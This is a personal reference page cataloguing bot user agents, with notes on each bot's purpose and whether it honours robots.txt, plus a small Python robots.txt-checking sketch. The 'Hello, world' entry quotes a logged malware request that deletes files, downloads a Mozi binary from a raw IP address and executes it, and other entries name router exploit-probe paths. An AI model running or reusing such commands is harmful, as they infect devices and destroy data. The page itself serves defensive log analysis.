Herr Bischoff's Bot Database

Please find below a manually curated and researched list of user agents I came across. It's impressive to see how many of the bots active today flat out do not respect robots.txt settings, or claim to respect them but ignore them anyway. This list is updated regularly, whenever I spot new user agents and look into their behavior. There is no JavaScript here, no fancy search.
Cmd-F and Ctrl-F work beautifully.
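
As a rough illustration of what "does not respect robots.txt" means in practice, here is a minimal Python sketch that compares logged requests against a robots.txt file using the standard library's `urllib.robotparser`. It is not the method used to compile this list. The robots.txt content, the bot names (`ExampleBot`, `OtherBot`) and the log entries are all made up for the example.

```python
from urllib.robotparser import RobotFileParser

# Hypothetical robots.txt content, used only for this illustration.
ROBOTS_TXT = """\
User-agent: *
Disallow: /private/

User-agent: ExampleBot
Disallow: /
"""


def find_violations(robots_txt, requests):
    """Return the (user_agent, path) pairs that the given robots.txt disallows."""
    parser = RobotFileParser()
    parser.parse(robots_txt.splitlines())
    return [(ua, path) for ua, path in requests if not parser.can_fetch(ua, path)]


# Hypothetical log excerpt: (user agent string, requested path).
LOGGED = [
    ("ExampleBot/1.0", "/index.html"),                            # banned entirely
    ("Mozilla/5.0 (compatible; OtherBot/2.0)", "/index.html"),    # allowed
    ("Mozilla/5.0 (compatible; OtherBot/2.0)", "/private/data"),  # disallowed for everyone
]

violations = find_violations(ROBOTS_TXT, LOGGED)
for ua, path in violations:
    print(f"{ua} requested disallowed path {path}")
```

One caveat: the standard library parser only looks at the part of the user agent before the first slash. A full string starting with "Mozilla/5.0" therefore only ever matches the `*` group. To test bot-specific rules, pass the bot's name token instead of the full string.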

The information on this site is free as in beer. I take no responsibility for anything related to it and commercial use is explicitly forbidden. Meaning: you are not allowed to sell it, either separately or as part of a product. Otherwise it's public information. Please don't do anything stupid.

I'm always happy to hear from people this helped in some small way. If you feel like it, drop me a line: marcel@herrbischoff.com

AccompanyBot #

Notes
AI-driven relationship intelligence platform. Basically a sales tool.
Website
https://www.accompany.com

Data Mining Unknown if it respects robots.txt

Adsbot #

User Agent String
Mozilla/5.0 (compatible; Adsbot/3.1)
Notes
No public information available. All IPs point to webnx.com.

Suspicious Does not respect robots.txt

adscanner #

User Agent String
Mozilla/5.0 (compatible; adscanner/)/1.0 (http://seocompany.store; spider@seocompany.store)
Notes
Advertising technology company.
Website
http://seocompany.store

Advertising Unknown if it respects robots.txt

adstxt.com #

User Agent String
adstxt.com/1.2
Notes
Internet-wide crawl of ads.txt files.
Website
https://www.adstxt.com

Advertising Does not respect robots.txt

aiHitBot #

User Agent String
Mozilla/5.0 (compatible; aiHitBot/2.9; +https://www.aihitdata.com/about)
Notes
Company search engine.
Website
https://www.aihitdata.com/about

Search Respects robots.txt

aiohttp #

User Agent String
Python/3.7 aiohttp/3.0.9
Notes
Asynchronous HTTP Client/Server for asyncio and Python.
Website
https://docs.aiohttp.org/en/stable/

Automation Does not respect robots.txt

Ankit #

User Agent String
Ankit
Notes
Probably malware. Sends exclusively "POST /cgi-bin/ViewLog.asp HTTP/1.1" requests.

Malware Does not respect robots.txt

Applebot #

User Agent String
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot)
Notes
Web crawler for Apple products like Siri and Spotlight Suggestions.
Website
http://www.apple.com/go/applebot

Search Respects robots.txt

archive.org_bot #

User Agent String
Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)
Notes
Archive.org Wayback Machine crawler. Ignores robots.txt, because "Over time we have observed that the robots.txt files that are geared toward search engine crawlers do not necessarily serve our archival purposes." (Source: https://blog.archive.org/2017/04/17/robots-txt-meant-for-search-engines-dont-work-well-for-web-archives)
Website
http://www.archive.org/details/archive.org_bot

Archival Does not respect robots.txt

AspiegelBot #

User Agent String
Mozilla/5.0 (compatible;AspiegelBot)
Notes
Chinese search engine operated by Huawei.
Website
https://aspiegel.com/about

Advertising Does not respect robots.txt

axios #

User Agent String
axios/0.19.0
Notes
Promise based HTTP client for the browser and node.js.
Website
https://github.com/axios/axios

Automation Does not respect robots.txt

Baiduspider #

User Agent String
Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
Notes
Major Chinese search engine. Ignores robots.txt despite claiming otherwise.
Website
http://www.baidu.com/search/spider.html

Search Does not respect robots.txt

BananaBot #

User Agent String
BananaBot/0.6.1
Notes
No public information available.

Suspicious Does not respect robots.txt

Barkrowler #

User Agent String
Barkrowler/0.9 (+http://www.exensa.com/crawl)
Notes
French company specializing in large scale text data analysis.
Website
http://www.exensa.com/crawl/

Data Mining Respects robots.txt

bingbot #

User Agent String
Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
Notes
The Microsoft Bing search engine.
Website
http://www.bing.com/bingbot.htm

Search Respects robots.txt

Blackboard Safeassign #

User Agent String
Blackboard Safeassign
Notes
Anti-plagiarism service.

Legal Does not respect robots.txt

borneoBot #

User Agent String
borneoBot/0.6.7 (crawlcheck123@gmail.com)
Notes
No public information available.

Suspicious Does not respect robots.txt

botnet #

User Agent String
botnet/2.0
Notes
Malware trying to infect MIPS platforms.

Malware Does not respect robots.txt

BuiltWith #

User Agent String
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BuiltWith/1.0; +http://builtwith.com/biup) Chrome/74.0.3729.131 Safari/537.36
Notes
BuiltWith website technology analysis.
Website
http://builtwith.com/biup

Data Mining Does not respect robots.txt

BW/1.1 #

User Agent String
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/2W6Px8S) Chrome/74.0.3729.131 Safari/537.36
Notes
BuiltWith website technology analysis.
Website
https://builtwith.com/biup

Data Mining Does not respect robots.txt

CATExplorador #

User Agent String
CATExplorador/1.0beta (sistemes at domini dot cat; http://domini.cat/catexplorador.html)
Notes
Domain intelligence tool of .cat NIC.
Website
http://domini.cat/catexplorador.html

Data Mining Does not respect robots.txt

CCBot #

User Agent String
CCBot/2.0 (https://commoncrawl.org/faq/)
Notes
Non-profit organization dedicated to providing a copy of the internet to internet researchers, companies and individuals at no cost for the purpose of research and analysis.
Website
https://commoncrawl.org/faq/

Data Mining Respects robots.txt

CheckHost #

User Agent String
CheckHost (https://check-host.net/)
Notes
Website monitoring service. Suspect if you didn't set this up yourself.
Website
https://check-host.net/

Automation Does not respect robots.txt

CheckMarkNetwork #

User Agent String
CheckMarkNetwork/1.0 (+http://www.checkmarknetwork.com/spider.html)
Notes
Intellectual Property and "Brand Protection" company.
Website
http://www.checkmarknetwork.com/spider.html

Legal Respects robots.txt

chimebot #

User Agent String
chimebot
Notes
No public description available.

Suspicious Does not respect robots.txt

Cincraw #

User Agent String
Mozilla/5.0 (compatible; Cincraw/1.0; +http://cincrawdata.net/bot/)
Notes
Chinese company performing unexplained processing of website data.
Website
http://cincrawdata.net/bot/

Data Mining Does not respect robots.txt

CISPA Webcrawler #

User Agent String
CISPA Webcrawler (https://vuln-notify-checker.cispa.saarland)
Notes
Security vulnerability scanner of the German Helmholtz-Zentrum for Information Security.
Website
https://vuln-notify-checker.cispa.saarland

Security Does not respect robots.txt

Clarabot #

User Agent String
Mozilla/5.0 (compatible; Clarabot/1.4; +http://www.clarabot.info/bots)
Notes
No public information available. Website defunct.
Website
http://www.clarabot.info/bots

Suspicious Respects robots.txt

Cliqzbot #

User Agent String
Mozilla/5.0 (compatible; Cliqzbot/3.0; +http://cliqz.com/company/cliqzbot)
Notes
Now-defunct web crawler of a German startup funded by major publishing house Hubert Burda. They used to sling "EU tech sovereignty" rhetoric while they existed. Despite claiming otherwise, it never fully respected robots.txt.
Website
http://cliqz.com/company/cliqzbot

Search Does not respect robots.txt

Cloud mapping experiment #

User Agent String
Cloud mapping experiment. Contact research@pdrlabs.net
Notes
No public information available. IPs are AWS instances.

Suspicious Does not respect robots.txt

CMS Crawler #

User Agent String
Mozilla/4.0 (CMS Crawler: http://www.cmscrawler.com)
Notes
Commercial technology insights company. They sell lists of who uses what technology on their websites.
Website
http://www.cmscrawler.com

Data Mining Does not respect robots.txt

coccocbot-image #

User Agent String
Mozilla/5.0 (compatible; coccocbot-image/1.0; +http://help.coccoc.com/searchengine)
Notes
Vietnamese search engine.
Website
http://help.coccoc.com/searchengine

Search Respects robots.txt

coccocbot-web #

User Agent String
Mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine)
Notes
Vietnamese search engine.
Website
http://help.coccoc.com/searchengine

Search Respects robots.txt

CowBot #

User Agent String
CowBot/1.0
Notes
No public information available.

Suspicious Respects robots.txt

crawler4j #

User Agent String
crawler4j (https://github.com/yasserg/crawler4j/)
Notes
Open Source Web Crawler for Java.
Website
https://github.com/yasserg/crawler4j/

Automation Does not respect robots.txt

curb #

User Agent String
curb
Notes
No public information available.

Suspicious Does not respect robots.txt

curl #

User Agent String
curl/7.70.0
Notes
Command line tool and library for transferring data with URLs.
Website
https://curl.haxx.se

Automation Does not respect robots.txt

Datanyze #

User Agent String
Mozilla/5.0 (X11; Datanyze; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Notes
"Technographics" and "Data Enrichment" company.
Website
https://www.datanyze.com

Data Mining Does not respect robots.txt

DF Bot #

User Agent String
DF Bot 1.0
Notes
No public information available.

Suspicious Does not respect robots.txt

Dispatch #

User Agent String
Dispatch/0.14.0-SNAPSHOT
Notes
Scala wrapper for the Java AsyncHttpClient.
Website
https://dispatchhttp.org/

Automation Does not respect robots.txt

Domains Project #

User Agent String
Mozilla/5.0 (compatible; Domains Project/1.1.0; +https://domainsproject.org)
Notes
World’s single largest Internet domains dataset.
Website
https://domainsproject.org

Data Mining Does not respect robots.txt

DotBot #

User Agent String
Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)
Notes
Backlink analysis tool.
Website
http://www.opensiteexplorer.org/dotbot

SEO Respects robots.txt

drupalfinder #

User Agent String
drupalfinder1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Notes
No public information available.

Suspicious Does not respect robots.txt

DuckDuckBot-Https #

User Agent String
Mozilla/5.0 (compatible; DuckDuckBot-Https/1.1; https://duckduckgo.com/duckduckbot)
Notes
Web crawler for DuckDuckGo, a privacy-respecting search engine.
Website
https://duckduckgo.com/duckduckbot

Search Respects robots.txt

DuckDuckGo-Favicons-Bot #

User Agent String
Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)
Notes
Part of the DuckDuckGo search engine.
Website
http://duckduckgo.com

Search Does not respect robots.txt

eContext #

User Agent String
eContext/1.0 (eContext Classification Engine)
Notes
Text context classification service. Downloads robots.txt but ignores it.
Website
https://www.econtext.ai/

Data Mining Does not respect robots.txt

Elisabot #

User Agent String
Elisabot
Notes
No public information available.

Suspicious Does not respect robots.txt

eZ Publish Link Validator #

User Agent String
eZ Publish Link Validator
Notes
Part of the eZ Publishing Platform by Ibexa.
Website
https://www.ibexa.co

Automation Does not respect robots.txt

FeedFetcher-Google #

User Agent String
FeedFetcher-Google; (+http://www.google.com/feedfetcher.html)
Notes
Feedfetcher is how Google grabs RSS or Atom feeds for Google Play Newsstand and PubSubHubbub.
Website
http://www.google.com/feedfetcher.html

Search Does not respect robots.txt

finbot #

User Agent String
finbot
Notes
No public information available.

Suspicious Unknown if it respects robots.txt

GarlikCrawler #

User Agent String
GarlikCrawler/1.2 (http://garlik.com/, crawler@garlik.com)
Notes
No public information available. Website does not connect.
Website
http://garlik.com/

Suspicious Respects robots.txt

Googlebot #

User Agent String
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Notes
Google search engine crawler.
Website
http://www.google.com/bot.html

Search Respects robots.txt

HeadlessChrome #

User Agent String
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/68.0.3440.106 Safari/537.36
Notes
Developer tool that has no business visiting production websites of third parties.
Website
https://developers.google.com/web/updates/2017/04/headless-chrome

Automation Does not respect robots.txt

HealthCheckBot #

User Agent String
HealthCheckBot/0.2
Notes
No public information available.

Suspicious Does not respect robots.txt

Hello, world #

User Agent String
Hello, world
Notes
Anomalous user agent from a malware injection attempt sending "GET /shell?cd+/tmp;rm+-rf+*;wget+http://111.43.223.103:35300/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1".

Malware Does not respect robots.txt

heritrix #

User Agent String
Mozilla/5.0 (compatible; heritrix/3.4.0-20200304 +http://hbi640.ir/)
Notes
No public information available. Unreachable website. Heritrix is an open source web crawler designed for web archiving. It was written by the Internet Archive.
Website
http://hbi640.ir/

Archival Respects robots.txt

IndeedBot #

User Agent String
Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0 (IndeedBot 1.1)
Notes
No public information available.

Suspicious Does not respect robots.txt

Integrity #

User Agent String
Mozilla/5.0 (compatible; Integrity/8; +https://peacockmedia.software/mac/integrity/
Notes
Broken link checking software.
Website
https://peacockmedia.software/mac/integrity/

Automation Does not respect robots.txt

Internet-structure-research-project-bot #

User Agent String
Internet-structure-research-project-bot
Notes
No public information available. IPs based in Russia.

Suspicious Does not respect robots.txt

ips-agent #

User Agent String
Mozilla/5.0 (compatible; ips-agent)
Notes
No public information available.

Suspicious Unknown if it respects robots.txt

Java #

User Agent String
Java/1.8.0_211
Notes
Oracle Java built-in HTTP client library. Only lazy or malicious developers never bother to change the default user agent string.
Website
https://www.java.com/en/

Automation Does not respect robots.txt

JobboerseBot #

User Agent String
Mozilla/5.0 (X11; U; Linux Core i7-4980HQ; de; rv:32.0; compatible; JobboerseBot; http://www.jobboerse.com/bot.htm) Gecko/20100101 Firefox/38.0
Notes
Operated by XING for their job search and suggestion engine.
Website
http://www.jobboerse.com/bot.htm

Data Mining Unknown if it respects robots.txt

KOCMOHABT #

User Agent String
KOCMOHABT (https://kozmonavt.tk/) Mozilla/5.0 (Web Explorer)
Notes
No public information available. Website is an expired domain redirecting to junk.
Website
https://kozmonavt.tk/

Suspicious Does not respect robots.txt

LCC #

User Agent String
LCC (+http://corpora.informatik.uni-leipzig.de/crawler_faq.html)
Notes
A project of the Natural Language Processing Group of the University of Leipzig. The LCC offers access to monolingual dictionaries in more than 200 languages. Despite claiming otherwise, it does not respect robots.txt exclusions.
Website
http://corpora.informatik.uni-leipzig.de/crawler_faq.html

Data Mining Does not respect robots.txt

Leap #

User Agent String
Leap
Notes
No public information available.

Suspicious Does not respect robots.txt

Let's Encrypt validation server #

User Agent String
Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)
Notes
Let's Encrypt certification authority. You probably initiated this yourself. Does not need to adhere to robots.txt since it's just verifying the domain to issue a TLS certificate, which is generally a user-initiated action.
Website
https://www.letsencrypt.org

Security Does not respect robots.txt

libwww-perl #

User Agent String
libwww-perl/6.43
Notes
Set of Perl modules which provides a simple and consistent application programming interface to the World-Wide Web.
Website
https://github.com/libwww-perl/libwww-perl

Automation Does not respect robots.txt

LightspeedSystemsCrawler #

User Agent String
LightspeedSystemsCrawler Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Notes
Cloud-based content filter service.
Website
https://www.lightspeedsystems.com

Security Respects robots.txt

Linguee Bot #

User Agent String
Linguee Bot (http://www.linguee.com/bot; bot@linguee.com)
Notes
Search engine for translations in context. The examples on the site are collected by this crawler.
Website
http://www.linguee.com/bot

Search Respects robots.txt

ltx71 #

User Agent String
ltx71 - (http://ltx71.com/)
Notes
Security research bot.
Website
http://ltx71.com/

Security Respects robots.txt

lua-resty-http #

User Agent String
lua-resty-http/0.10 (Lua) ngx_lua/10000
Notes
Lua HTTP client cosocket driver for OpenResty / ngx_lua.
Website
https://github.com/ledgetech/lua-resty-http

Automation Does not respect robots.txt

Mail.RU_Bot #

User Agent String
Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)
Notes
Russian search engine. The crawler downloads robots.txt but ignores it.
Website
http://go.mail.ru/help/robots

Search Does not respect robots.txt

MauiBot #

User Agent String
MauiBot (crawler.feedback+wc@gmail.com)
Notes
No public information available.

Suspicious Respects robots.txt

MixrankBot #

User Agent String
Mozilla/5.0 (compatible; MixrankBot; crawler@mixrank.com)
Notes
Business intelligence platform.
Website
https://mixrank.com

Data Mining Does not respect robots.txt

MJ12bot #

User Agent String
Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)
Notes
Majestic.com backlink crawler.
Website
http://mj12bot.com/

SEO Respects robots.txt

myseosnapshot #

User Agent String
myseosnapshot/1.0
Notes
No public information available.

Suspicious Does not respect robots.txt

netEstate NE Crawler #

User Agent String
netEstate NE Crawler (+http://www.website-datenbank.de/)
Notes
German website indexer.
Website
http://www.website-datenbank.de/

Search Respects robots.txt

NetNewsWire #

User Agent String
NetNewsWire (RSS Reader; https://ranchero.com/netnewswire/)
Notes
Open source RSS feed reader.
Website
https://ranchero.com/netnewswire/

Automation Does not respect robots.txt

Nimbostratus-Bot #

User Agent String
Mozilla/5.0 (compatible; Nimbostratus-Bot/v1.3.2; http://cloudsystemnetworks.com)
Notes
No public information available.
Website
http://cloudsystemnetworks.com

Suspicious Does not respect robots.txt

oBot #

User Agent String
Mozilla/5.0 (compatible; oBot/2.3.1; http://www.xforce-security.com/crawler/)
Notes
No public information available. Website is defunct.
Website
http://www.xforce-security.com/crawler/

Suspicious Does not respect robots.txt

OnalyticaBot #

User Agent String
OnalyticaBot
Notes
No public information available.

Suspicious Does not respect robots.txt

OrgProbe #

User Agent String
OrgProbe/2.0.0 (+http://www.blocked.org.uk)
Notes
Will check if a site is being blocked by running tests on major fixed line ISPs and mobile networks.
Website
http://www.blocked.org.uk

Data Mining Does not respect robots.txt

Pandalytics #

User Agent String
Pandalytics/1.0 (https://domainsbot.com/pandalytics/)
Notes
Business intelligence company.
Website
https://domainsbot.com/pandalytics/

SEO Respects robots.txt

Panscient #

User Agent String
Mozilla/5.0 (compatible; Panscient/1.0; +http://panscient.com/faq.htm)
Notes
Crawls the web looking for corporate information, such as company names, addresses, executive biographies, job openings and product information. Also crawls the web to locate genealogy pages, such as birth, marriage and death records, obituaries and census records.
Website
http://panscient.com/faq.htm

Data Mining Respects robots.txt

Pinterest #

User Agent String
Pinterest/0.2 (+https://www.pinterest.com/bot.html)
Notes
Pinterest crawls liked sites for signals that enable them to infer better recommendations, fight spam, and display useful information.
Website
https://www.pinterest.com/bot.html

Data Mining Respects robots.txt

Pinterestbot #

User Agent String
Mozilla/5.0 (compatible; Pinterestbot/1.0; +http://www.pinterest.com/bot.html)
Notes
Pinterest crawls liked sites for signals that enable them to infer better recommendations, fight spam, and display useful information.
Website
http://www.pinterest.com/bot.html

Data Mining Respects robots.txt

Plukkie #

User Agent String
Mozilla/5.0 (compatible; Plukkie/1.6; http://www.botje.com/plukkie.htm)
Notes
Indexer for search engine botje.com. Bad search results, apparently abandoned.
Website
http://www.botje.com/plukkie.htm

Search Respects robots.txt

polaris botnet #

User Agent String
polaris botnet
Notes
Malware sending exclusively "POST /boaform/admin/formPing HTTP/1.1" requests.

Malware Does not respect robots.txt

python-requests #

User Agent String
python-requests/2.21.0
Notes
HTTP library for Python. Usually used by lazy scanners (script kiddies) and automated probing for obvious vulnerabilities.
Website
https://2.python-requests.org/en/master/

Automation Does not respect robots.txt

Qwantify #

User Agent String
Qwantify/1.0
Notes
European search engine based in France.
Website
https://help.qwant.com/bot

Search Respects robots.txt

Qwantify/Bleriot #

User Agent String
Mozilla/5.0 (compatible; Qwantify/Bleriot/1.1; +https://help.qwant.com/bot)
Notes
European search engine based in France.
Website
https://help.qwant.com/bot

Search Respects robots.txt

Researchscan #

User Agent String
Mozilla/5.0 zgrab/0.x (compatible; Researchscan/t12sns; +http://researchscan.comsys.rwth-aachen.de)
Notes
Internet-wide research study being conducted by computer scientists at RWTH Aachen University.
Website
http://researchscan.comsys.rwth-aachen.de

Security Does not respect robots.txt

RestSharp #

User Agent String
RestSharp/105.2.3.0
Notes
REST API client library for .NET. If you don't publish an API, this client has no business visiting a production website.
Website
https://restsharp.dev

Automation Does not respect robots.txt

Riddler #

User Agent String
Riddler (http://riddler.io/about)
Notes
Online research project which investigates algorithms for mapping the topology of the Internet. Riddler collects data about public systems via crawling and port mapping common ports.
Website
http://riddler.io/about

Data Mining Respects robots.txt

RobotsChecker #

User Agent String
RobotsChecker/0.6 (+http://www.blocked.org.uk)
Notes
Will check if a site is being blocked by running tests on major fixed line ISPs and mobile networks.
Website
http://www.blocked.org.uk

Data Mining Does not respect robots.txt

RyteBot #

User Agent String
RyteBot/1.0.0 (+https://bot.ryte.com/)
Notes
SEO company.
Website
https://en.ryte.com/bot/

SEO Unknown if it respects robots.txt

Scrapy #

User Agent String
Scrapy/1.7.2 (+https://scrapy.org)
Notes
Scraping framework for Python. Recommends changing the user agent, so only lazy developers don't do it.
Website
https://scrapy.org

Automation Unknown if it respects robots.txt

SearchAtlas.com SEO Crawler #

User Agent String
SearchAtlas.com SEO Crawler
Notes
SEO company.
Website
https://www.searchatlas.com

SEO Respects robots.txt

Seekport Crawler #

User Agent String
Mozilla/5.0 (compatible; Seekport Crawler; http://seekport.com/
Notes
Generic search engine based in Germany.
Website
http://seekport.com/

Search Unknown if it respects robots.txt

SemrushBot #

User Agent String
Mozilla/5.0 (compatible; SemrushBot/1.0~bm; +http://www.semrush.com/bot.html)
Notes
SEO company.
Website
http://www.semrush.com/bot.html

SEO Respects robots.txt

Semtix.cz #

User Agent String
Semtix.cz <https://semtix.cz/bot>
Website
https://semtix.cz/bot

SEO Does not respect robots.txt

SeoChecker #

User Agent String
Mozilla/5.0 (compatible; SeoChecker/1.1)
Notes
SEO company.
Website
https://seochecker.us

SEO Does not respect robots.txt

SeznamBot #

User Agent String
Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)
Notes
Czech search engine. Downloads robots.txt but sometimes ignores it.
Website
http://napoveda.seznam.cz/en/seznambot-intro/

Search Does not respect robots.txt

shopify-partner-homepage-scraper #

User Agent String
shopify-partner-homepage-scraper
Notes
No public information available. Verified with Shopify that this is not a service of theirs.

Suspicious Does not respect robots.txt

SMTBot #

User Agent String
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36 (compatible; SMTBot/1.0; +http://www.similartech.com/smtbot)
Notes
Identifies technologies used on websites.
Website
http://www.similartech.com/smtbot

Data Mining Does not respect robots.txt

Sophora #

User Agent String
Mozilla/5.0 (compatible; Sophora; http://www.subshell.com)
Notes
Part of the Sophora CMS system.
Website
http://www.subshell.com

Automation Does not respect robots.txt

special_archiver #

User Agent String
Mozilla/5.0 (compatible; special_archiver/3.1.1 +http://www.archive.org/details/archive.org_bot)
Notes
Archive.org Wayback Machine crawler. Ignores robots.txt, because "Over time we have observed that the robots.txt files that are geared toward search engine crawlers do not necessarily serve our archival purposes." (Source: https://blog.archive.org/2017/04/17/robots-txt-meant-for-search-engines-dont-work-well-for-web-archives)
Website
http://www.archive.org/details/archive.org_bot

Archival Does not respect robots.txt

spider #

User Agent String
spider
Notes
No public information available. The IPs logged are connected to financialbot.com, although the website is defunct. Mostly interested in pages with contact information.

Suspicious Does not respect robots.txt

Spider2.0 #

User Agent String
Spider2.0
Notes
No public information available.

Suspicious Does not respect robots.txt

SpiderLing #

User Agent String
Mozilla/5.0 (compatible; SpiderLing (a SPIDER for LINGustic research); +http://nlp.fi.muni.cz/projects/biwec/)
Notes
Linguistic research crawler.
Website
http://nlp.fi.muni.cz/projects/biwec/

Data Mining Respects robots.txt

SurdotlyBot #

User Agent String
Mozilla/5.0 (compatible; SurdotlyBot/1.0; +http://sur.ly/bot.html)
Notes
"Safe browsing" company.
Website
http://sur.ly/bot.html

Security Does not respect robots.txt

SWRLinkchecker #

User Agent String
SWRLinkchecker
Notes
Part of the online publishing infrastructure of German public broadcaster Südwestrundfunk.
Website
https://www.swr.de

Automation Does not respect robots.txt

TelegramBot #

User Agent String
TelegramBot (like TwitterBot)
Notes
Bots running on the Telegram network.
Website
https://telegram.org

Automation Does not respect robots.txt

Testcrawler #

User Agent String
Testcrawler
Notes
No public information available.

Suspicious Does not respect robots.txt

The Knowledge AI #

User Agent String
The Knowledge AI
Notes
No public information available.

Suspicious Respects robots.txt

TprAdsTxtCrawler #

User Agent String
TprAdsTxtCrawler/1.0
Notes
No public information available.

Suspicious Does not respect robots.txt

tracemyfile #

User Agent String
Mozilla/5.0 (compatible; tracemyfile/1.0; +bot@tracemyfile.com)
Notes
Image usage tracking service.
Website
https://www.tracemyfile.com

Data Mining Does not respect robots.txt

TweetmemeBot #

User Agent String
Mozilla/5.0 (TweetmemeBot/4.0; +http://datasift.com/bot.html) Gecko/20100101 Firefox/31.0
Notes
Link expanding service.
Website
http://datasift.com/bot.html

Automation Does not respect robots.txt

Twingly Recon #

User Agent String
Mozilla/5.0 (compatible; Twingly Recon; twingly.com)
Notes
Social data mining company.
Website
https://www.twingly.com

Data Mining Respects robots.txt

UniversalFeedParser #

User Agent String
UniversalFeedParser/5.2.1 +https://code.google.com/p/feedparser/
Notes
Parses Atom and RSS feeds in Python.
Website
https://github.com/kurtmckee/feedparser

Automation Does not respect robots.txt

UptimeRobot #

User Agent String
Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)
Notes
Website monitoring service.
Website
http://www.uptimerobot.com/

Automation Does not respect robots.txt

VelenPublicWebCrawler #

User Agent String
Mozilla/5.0 (compatible; VelenPublicWebCrawler/1.0; +https://velen.io)
Notes
Business intelligence company.
Website
https://hunter.io/robot

Data Mining Does not respect robots.txt

VsuSearchSpider #

User Agent String
VsuSearchSpider/1.0
Notes
No public information available.

Suspicious Respects robots.txt

W3C_Validator #

User Agent String
W3C_Validator/1.3 http://validator.w3.org/services
Notes
W3C validation services. Does not need to respect robots.txt since the request is always user-initiated.
Website
http://validator.w3.org/services

Automation Does not respect robots.txt

Wappalyzer #

User Agent String
Mozilla/5.0 (compatible; Wappalyzer)
Notes
"Technographics" data provider, uncovering technologies such as content management systems, customer relationship management, ecommerce platforms, advertising networks, marketing tools and analytics.
Website
https://www.wappalyzer.com

Data Mining Does not respect robots.txt

webtechbot #

User Agent String
Mozilla/5.0 (compatible; webtechbot; +https://www.webtechsurvey.com/bot)
Notes
Mines for used web technologies.
Website
https://www.webtechsurvey.com/bot

Data Mining Respects robots.txt

Wget #

User Agent String
Wget/1.20 (mingw32)
Notes
Free software package for retrieving files using HTTP, HTTPS, FTP and FTPS. Usually up to no good unless you explicitly host downloads that are to be automatically retrieved.
Website
https://www.gnu.org/software/wget/

Automation Does not respect robots.txt

Who.is Bot #

User Agent String
Who.is Bot
Notes
No public information available. Apparently belongs to the site who.is, but it is unclear what it does.
Website
https://who.is

Suspicious Does not respect robots.txt

WinHttp #

User Agent String
Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Notes
Windows built-in HTTP library. Usually up to no good.

Automation Does not respect robots.txt

woorankreview #

User Agent String
Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.34 (KHTML, like Gecko) Version/11.0 Mobile/15A5341f Safari/604.1 (compatible; woorankreview/2.0; +https://www.woorank.com/)
Notes
SEO company.
Website
https://www.woorank.com/

SEO Does not respect robots.txt

www.deadlinkchecker.com #

User Agent String
www.deadlinkchecker.com Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Notes
Dead link crawler.
Website
https://www.deadlinkchecker.com

Automation Does not respect robots.txt

Xenu Link Sleuth #

User Agent String
Xenu Link Sleuth/1.3.8
Notes
Broken link checking software. Should only be used on one's own site.
Website
http://home.snafu.de/tilman/xenulink.html

Automation Does not respect robots.txt

XTC #

User Agent String
XTC
Notes
Malware exclusively sending the request "POST /cgi-bin/mainfunction.cgi HTTP/1.1".

Malware Does not respect robots.txt

yacybot #

User Agent String
yacybot (/global; amd64 Linux 5.7.4; java 1.8.0_201; America/en) http://yacy.net/bot.html
Notes
Peer-to-Peer web search engine.
Website
http://yacy.net/bot.html

Search Respects robots.txt

YandexBot #

User Agent String
Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)
Notes
Major Russian search engine. Downloads robots.txt but sometimes ignores it.
Website
http://yandex.com/bots

Advertising Does not respect robots.txt

YandexMobileBot #

User Agent String
Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B411 Safari/600.1.4 (compatible; YandexMobileBot/3.0; +http://yandex.com/bots)
Notes
Major Russian search engine. Downloads robots.txt but sometimes ignores it.
Website
http://yandex.com/bots

Search Does not respect robots.txt

Yeti #

User Agent String
Mozilla/5.0 (compatible; Yeti/1.1; +http://naver.me/spd)
Notes
Korean search engine Naver.
Website
http://naver.me/spd

Search Respects robots.txt

ZoominfoBot #

User Agent String
ZoominfoBot (zoominfobot at zoominfo dot com)
Notes
Business intelligence company.
Website
https://www.zoominfo.com

Data Mining Respects robots.txt
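
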